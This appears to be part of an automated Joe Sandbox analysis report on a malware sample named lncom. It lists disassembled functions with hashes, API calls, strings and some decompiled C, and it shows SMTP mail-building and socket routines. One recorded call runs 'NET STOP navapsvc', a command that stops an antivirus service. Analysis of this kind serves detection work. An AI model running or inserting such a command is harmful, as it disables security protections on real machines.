Opcode Fuzzy Hash: 7c17ca1ebbb8b540ff05e1bcf77e6e2eb5f7827096db5852693825080acac50e
Instruction Fuzzy Hash: A0019670600208AFDB01EFAACC4299DB7ECEB49304F6041BBB404D3251DB38DE14975A

Uniqueness

Uniqueness Score: -1.00%

Function 00444E80 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46COMMON

Download Yara Rule

APIs

@Smtpprot@TCustomSmtpClient@TriggerHeaderLine$qqrpci.LNCOM ref: 00444EF9

Strings

CONTENT-TYPE:, xrefs: 00444EAF
Content-Type: multipart/mixed;boundary=", xrefs: 00444EC5

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: Client@CustomHeaderLine$qqrpciSmtpSmtpprot@Trigger
String ID: CONTENT-TYPE:$Content-Type: multipart/mixed;boundary="
API String ID: 2863357299-1408060163
Opcode ID: 8a459e9eb7118132be20a0dcf9abd690a529c6da697a7313a29224437695b462
Instruction ID: 232540868548a321f9ff384246b45f409ecb583f8b7549f6eb4bee290c23cead
Opcode Fuzzy Hash: 8a459e9eb7118132be20a0dcf9abd690a529c6da697a7313a29224437695b462
Instruction Fuzzy Hash: 92116134A04208AFEB04DF95D841B9EF7B5FB89304FA144BAE514A3791D738AE04CB58

Uniqueness

Uniqueness Score: -1.00%

Function 00488918 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(00000000), ref: 00488966
GetSystemMetrics.USER32(00000001), ref: 00488978

Part of subcall function 00488680: GetProcAddress.KERNEL32(748F0000,00000000), ref: 00488700

Strings

MonitorFromPoint, xrefs: 0048892A

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: MetricsSystem$AddressProc
String ID: MonitorFromPoint
API String ID: 1792783759-1072306578
Opcode ID: 064fe353bb57b20282cbb10ba7d00c73c24430c4958e3b19ef46931faa5a5908
Instruction ID: ac5a88d9be9103f2b782ffdc0684f544017401bfe0f386b9b01c51387a89c861
Opcode Fuzzy Hash: 064fe353bb57b20282cbb10ba7d00c73c24430c4958e3b19ef46931faa5a5908
Instruction Fuzzy Hash: E701DF7620110A6BEB206F45DC44B6FBB60E760314F8D892FF905EA251CA748C05EFA6

Uniqueness

Uniqueness Score: -1.00%

Function 004887F0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(00000000), ref: 00488841
GetSystemMetrics.USER32(00000001), ref: 0048884D

Part of subcall function 00488680: GetProcAddress.KERNEL32(748F0000,00000000), ref: 00488700

Strings

MonitorFromRect, xrefs: 00488805

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: MetricsSystem$AddressProc
String ID: MonitorFromRect
API String ID: 1792783759-4033241945
Opcode ID: f5c754a102d274ef4ba95f003c425d7dc46630a76c60b533481e06bb7727fbc0
Instruction ID: 4e3d54ed1a63be197cb3670fc6285c55a158760948b4c014d9b922c639589a40
Opcode Fuzzy Hash: f5c754a102d274ef4ba95f003c425d7dc46630a76c60b533481e06bb7727fbc0
Instruction Fuzzy Hash: E9018F356002149BEB20BB04D985B1BB764E755361FC8496FE905CA643CB78DC44DFB6

Uniqueness

Uniqueness Score: -1.00%

Function 00495208 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNEL32(?,?,?,?,00000000,00000000,00000003,?,00000000,00441F1D,?,00000000,00442036), ref: 0049522D
GetLastError.KERNEL32(?,?,00000000,00000000,00000003,?,00000000,00441F1D,?,00000000,00442036), ref: 00495256

Strings

6 D, xrefs: 0049523C

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: ErrorFileLastRead
String ID: 6 D
API String ID: 1948546556-999481627
Opcode ID: 2f1ae292377467acdc01cab0ef4af538854650df7a85ffce0d40b6b46ca9b23a
Instruction ID: 3b2b61a73226b08378efe11eb87596a348c79b08e260b7a9ff7f77c84694730e
Opcode Fuzzy Hash: 2f1ae292377467acdc01cab0ef4af538854650df7a85ffce0d40b6b46ca9b23a
Instruction Fuzzy Hash: 30F096713046015FEF159FA9D9C1B277A5AEB85314F34C0B7F409CA244D5699C028BA9

Uniqueness

Uniqueness Score: -1.00%

Function 00488768 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 39COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(?), ref: 004887CA

Part of subcall function 00488680: GetProcAddress.KERNEL32(748F0000,00000000), ref: 00488700

GetSystemMetrics.USER32(?), ref: 00488790

Strings

GetSystemMetrics, xrefs: 00488778

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: MetricsSystem$AddressProc
String ID: GetSystemMetrics
API String ID: 1792783759-96882338
Opcode ID: f7ddbd8d8f02877c0425615720472c492188fe90c7e7b2f9b54301a8ed4d85d5
Instruction ID: 9f7401bfaf783f779b7063e074315f600bf662fb20d9d112e2d279a9d22d8ce0
Opcode Fuzzy Hash: f7ddbd8d8f02877c0425615720472c492188fe90c7e7b2f9b54301a8ed4d85d5
Instruction Fuzzy Hash: B6F062205441045AEA60BA389D8462F3677ABA5730BF44F2FA226866D5CE7C8845A31A

Uniqueness

Uniqueness Score: -1.00%

Function 0040CC43 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35COMMON

Download Yara Rule

APIs

ShellExecuteA.SHELL32(00000000,open,00000000,00000000,00000000,00000000), ref: 0040CC6E
ShellExecuteA.SHELL32(00000000,open,00000000,00000000,00000000,00000005), ref: 0040CCF1

Strings

@, xrefs: 0040CC43
open, xrefs: 0040CC67

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: ExecuteShell
String ID: @$open
API String ID: 587946157-267353779
Opcode ID: a153befc6f6f248066a47aed34ef5a1816e52ba1d5c837920a143c780dd524a3
Instruction ID: 3cdeb7ce5e61a3611fb6ebda66ff4cab16f71ebe9ce238e12cd990ae5f7ace7a
Opcode Fuzzy Hash: a153befc6f6f248066a47aed34ef5a1816e52ba1d5c837920a143c780dd524a3
Instruction Fuzzy Hash: E4F0903465020CEAEB10EFD1D882BDCB3B8EF95315F20417BE808B5182C77D8D4586AD

Uniqueness

Uniqueness Score: -1.00%

Function 0043460C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34COMMON

Download Yara Rule

APIs

@Wsocket@WSocket_WSACancelAsyncRequest$qqrui.LNCOM ref: 00434628

Part of subcall function 0043197C: @Wsocket@WSocketGetProc$qqrx17System@AnsiString.LNCOM ref: 00431993

@Wsocket@TCustomWSocket@SocketError$qqr17System@AnsiString.LNCOM ref: 00434644

Part of subcall function 004360D8: @Wsocket@WSocket_WSAGetLastError$qqrv.LNCOM(00000000,004361B6), ref: 00436105
Part of subcall function 004360D8: @Wsocket@WSocketErrorDesc$qqri.LNCOM(004361F4,?, in function ,?,Error ,00000000,004361B6), ref: 00436133
Part of subcall function 004360D8: @Wsocket@WSocket_closesocket$qqri.LNCOM(?,004361F4,?, in function ,?,Error ,00000000,004361B6), ref: 00436163
Part of subcall function 004360D8: @Wsocket@TCustomWSocket@ChangeState$qqr20Wsocket@TSocketState.LNCOM ref: 0043617A

Strings

WSACancelAsyncRequest, xrefs: 0043463C

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: Wsocket@$Socket$AnsiCustomSocket@Socket_StringSystem@$AsyncCancelChangeDesc$qqriErrorError$qqr17Error$qqrvLastProc$qqrx17Request$qqruiSocket_closesocket$qqriStateState$qqr20
String ID: WSACancelAsyncRequest
API String ID: 2357297992-1623008371
Opcode ID: 549c37c218588cd99fdb4b0f539184b251781cd7473689a99c8078e02f4bbb6d
Instruction ID: bf53dcd2bff33cede5ab67494ff65dbd06d707d0a93ce1c370e6ca4ebabe49ca
Opcode Fuzzy Hash: 549c37c218588cd99fdb4b0f539184b251781cd7473689a99c8078e02f4bbb6d
Instruction Fuzzy Hash: 42F014B0A00508EFDB54CF99C185B9DB7F5AF89304F2540EAE00C9B361DB39AE40DB18

Uniqueness

Uniqueness Score: -1.00%

Function 0049F1FC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?,0049F27C,?,C0000000,00000000,00000000,00000002,00000080,00000000,00000004,?,00000000,00000003,?,0049F43E,00000000), ref: 0049F200
wsprintfA.USER32 ref: 0049F239

Strings

%02d/%02d/%04d %02d:%02d:%02d.%03d , xrefs: 0049F22F

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: LocalTimewsprintf
String ID: %02d/%02d/%04d %02d:%02d:%02d.%03d
API String ID: 1577811021-3388318165
Opcode ID: a094aa1ebbd3eb3298cff450b482a42527e237e201057d1bf1300ea49a1aef47
Instruction ID: ccfe9be0863f7bd8fe651b5b2212847e72a6bf042c56826746fb317b41c69073
Opcode Fuzzy Hash: a094aa1ebbd3eb3298cff450b482a42527e237e201057d1bf1300ea49a1aef47
Instruction Fuzzy Hash: 05E01A8644C672B58664DF8F5C5297BB2E9BA8CB16F44590FB6E4802C1F66CC4C4E33B

Uniqueness

Uniqueness Score: -1.00%

Function 00454D64 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 23windowCOMMON

Download Yara Rule

APIs

CreatePopupMenu.USER32 ref: 00454D7F
CreateMenu.USER32 ref: 00454D89

Strings

h;E, xrefs: 00454D70

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: CreateMenu$Popup
String ID: h;E
API String ID: 257293969-2206276013
Opcode ID: 30d1eb3957f7c771b1bb60f237c9694dc2a40bae02ef5cda253fe18e05b230d6
Instruction ID: 348d3c8c9f8ab43ec0ea2450b66cb6fb2d34ec6783f2d73fe68d9ad3dc7f10f8
Opcode Fuzzy Hash: 30d1eb3957f7c771b1bb60f237c9694dc2a40bae02ef5cda253fe18e05b230d6
Instruction Fuzzy Hash: 07E0C9B06102008BCB10BF65C8C169937E0AB8832BF6115AAAC059F25BC679DCCDC79C

Uniqueness

Uniqueness Score: -1.00%

Function 0040E91F Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22processCOMMON

Download Yara Rule

APIs

WinExec.KERNEL32(NET STOP navapsvc,00000000), ref: 0040E931

Strings

P, xrefs: 0040E963
NET STOP navapsvc, xrefs: 0040E92C

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: Exec
String ID: NET STOP navapsvc$P
API String ID: 459137531-447547954
Opcode ID: 849fb219a45c930a5e666613ce4280a832a86af08f68660f464764218c989c2a
Instruction ID: 2345f171f35a419d5c5211fb2a5c5f9e8ea900202663db403d7c40bb223d9f8e
Opcode Fuzzy Hash: 849fb219a45c930a5e666613ce4280a832a86af08f68660f464764218c989c2a
Instruction Fuzzy Hash: 89F07474E10209CADB14DBA6C459BEEBBB0BF49308F10805ED1107B3E0D7B55944CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 00432C58 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 20COMMON

Download Yara Rule

APIs

@Wsocket@WSocket_ioctlsocket$qqriuiri.LNCOM ref: 00432C72

Part of subcall function 00431FC8: @Wsocket@WSocketGetProc$qqrx17System@AnsiString.LNCOM ref: 00431FE5

@Wsocket@TCustomWSocket@SocketError$qqr17System@AnsiString.LNCOM ref: 00432C89

Part of subcall function 004360D8: @Wsocket@WSocket_WSAGetLastError$qqrv.LNCOM(00000000,004361B6), ref: 00436105
Part of subcall function 004360D8: @Wsocket@WSocketErrorDesc$qqri.LNCOM(004361F4,?, in function ,?,Error ,00000000,004361B6), ref: 00436133
Part of subcall function 004360D8: @Wsocket@WSocket_closesocket$qqri.LNCOM(?,004361F4,?, in function ,?,Error ,00000000,004361B6), ref: 00436163
Part of subcall function 004360D8: @Wsocket@TCustomWSocket@ChangeState$qqr20Wsocket@TSocketState.LNCOM ref: 0043617A

Strings

ioctlSocket, xrefs: 00432C81

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: Wsocket@$Socket$AnsiCustomSocket@StringSystem@$ChangeDesc$qqriErrorError$qqr17Error$qqrvLastProc$qqrx17Socket_Socket_closesocket$qqriSocket_ioctlsocket$qqriuiriStateState$qqr20
String ID: ioctlSocket
API String ID: 1493330816-3533409816
Opcode ID: 620f66605bfa6d140c4764e2aced76c4ab29e9758dd2f6d1383909ce35b006c9
Instruction ID: 7f90107824424f1a3035726f402c7e6ddeefda498e6b412c14936e42356d2473
Opcode Fuzzy Hash: 620f66605bfa6d140c4764e2aced76c4ab29e9758dd2f6d1383909ce35b006c9
Instruction Fuzzy Hash: 67E04F30904209ABCB10DB98C5828DDB7B0EB04334F2052AAE424673E1EB356E009B48

Uniqueness

Uniqueness Score: -1.00%

Function 0044B404 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19networkCOMMON

Download Yara Rule

APIs

getservbyname.WS2_32(00000000,tcp), ref: 0044B414
htons.WS2_32(?), ref: 0044B424

Strings

tcp, xrefs: 0044B407

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: getservbynamehtons
String ID: tcp
API String ID: 3889749166-2993443014
Opcode ID: 0f8c4b67d02c673fe6946a7b9f3e2c357df3630ddaef80240bff10a13a96ebda
Instruction ID: dde0cf7d2d253291a18d0bcc2f35a135b678fa24ec20b2473449cf7a0ae20d0c
Opcode Fuzzy Hash: 0f8c4b67d02c673fe6946a7b9f3e2c357df3630ddaef80240bff10a13a96ebda
Instruction Fuzzy Hash: 41D0129930134112AF147AF61CC2AB6428C9A98305358187F7504CB247DE6CCC40E6BC

Uniqueness

Uniqueness Score: -1.00%

Function 004954D0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17COMMON

Download Yara Rule

APIs

GetVersionExA.KERNEL32 ref: 004954EE

Strings

lV], xrefs: 004954D8
USER32, xrefs: 004954D0

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: Version
String ID: USER32$lV]
API String ID: 1889659487-3975557005
Opcode ID: 37e63cb2e38c3a424135b1e4af3521b3da5007d36e8c839fcec7ff292b36820d
Instruction ID: 37d6d9e972444d8ac2c516d4b0f3b9dee5ae025d4a3494325111252971467e2f
Opcode Fuzzy Hash: 37e63cb2e38c3a424135b1e4af3521b3da5007d36e8c839fcec7ff292b36820d
Instruction Fuzzy Hash: 83D0A767604B0043D7201A38AC02B8F3694BB81735F4E017EB598462C0DB7D4645C1E7

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: services.exePID: 7544, Parent PID: 7496COMMON

Execution Graph

Execution Coverage:	7.8%
Dynamic/Decrypted Code Coverage:	80.6%
Signature Coverage:	0%
Total number of Nodes:	417
Total number of Limit Nodes:	4

Executed Functions

Function 1000158D Relevance: 31.6, APIs: 21, Instructions: 99
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 70%

			E1000158D(intOrPtr __eax, void* __ecx, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _t24;
				intOrPtr _t25;
				intOrPtr* _t27;
				intOrPtr _t32;
				intOrPtr* _t46;
				intOrPtr _t51;

				_t24 = __eax;
				if(_a8 != 1) {
					if(_a8 != 0) {
						if(_a8 == 3) {
							_push(0x10004168);
							L100013F6();
							L100018FA();
							_push(0xffffffff);
							L100018F4();
							_push(_a4);
							L100018E8();
							 *((intOrPtr*)(_v8 + 4)) = _v12;
						}
					} else {
						_push(0x10004168);
						L10001900();
						L1000191E();
						 *((intOrPtr*)(__eax + 8)) = __eax;
						L100013F0();
						_t27 =  *((intOrPtr*)(__eax + 4));
						if(_t27 != 0) {
							 *((intOrPtr*)( *_t27 + 0x70))();
						}
						L100018FA();
						_push(0xffffffff);
						L100018F4();
						L10001912();
						_push(1);
						_push(0x100051f8);
						L100018EE();
					}
					_t25 = 1;
					L17:
					return _t25;
				}
				_a8 = 0;
				L10001924();
				L1000191E();
				_push(0);
				_push(0x1000221c);
				_push(0);
				_t51 = __eax;
				_push(_a4);
				_t32 =  *((intOrPtr*)(__eax + 8));
				L10001918(); // executed
				if(__eax == 0) {
					L5:
					L10001912();
					L9:
					 *((intOrPtr*)(_t51 + 8)) = _t32;
					L1000191E();
					_push( *((intOrPtr*)(_t24 + 8)));
					L10001900();
					_t25 = _a8;
					goto L17;
				}
				L100013F0();
				_t46 =  *((intOrPtr*)(__eax + 4));
				if(_t46 == 0) {
					L6:
					_push(_a4);
					 *((intOrPtr*)(_t51 + 8)) = _t32;
					_push(0x100051f8);
					L1000190C();
					_push(0x40);
					L100018B8();
					if(_t24 != 0) {
						_push(0);
						_push(0x100051f8);
						L10001906();
					}
					_a8 = 1;
					goto L9;
				}
				_t24 =  *((intOrPtr*)( *_t46 + 0x58))();
				if(__eax != 0) {
					goto L6;
				}
				_t24 =  *((intOrPtr*)( *_t46 + 0x70))();
				goto L5;
			}

0x1000158d
0x10001597
0x10001634
0x10001680
